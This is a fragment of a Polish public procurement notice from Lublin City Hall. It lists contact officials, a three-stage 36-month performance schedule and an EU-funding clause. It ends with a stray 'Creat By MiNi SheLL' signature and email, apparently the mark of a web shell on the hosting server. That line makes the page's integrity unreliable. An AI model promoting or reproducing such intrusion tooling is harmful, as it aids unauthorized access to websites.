<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Osobami upoważnionymi do kontaktowania się z wykonawcami są:
1.1.W zakresie przedmiotu zamówienia: 
Część I i II - Pani Jolanta Tiszuk, ul. Wieniawska 14, pok. 712, tel. (81) 466 27 18,
Część III i IV - Pani Magdalena Stąpór, ul. Wieniawska 14, pok. 714, tel. (81) 466 27 21.
1.2.W zakresie procedury: p. Natalia Dziwulska - Biuro Zamówień Publicznych Urzędu Miasta  Lublin, Plac Litewski 1, pokój nr 3, telefon 81 466 30 14.
2.Termin wykonania zamówienia -  36 miesięcy od daty zawarcia umowy, w tym:
- etap I: 100 dni kalendarzowych od daty zawarcia umowy,
- etap II: 45 dni kalendarzowych od dnia otrzymania
pisemnego zlecenia od Zamawiającego,
- etap III: 45 dni kalendarzowych od dnia otrzymania
pisemnego zlecenia od Zamawiającego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com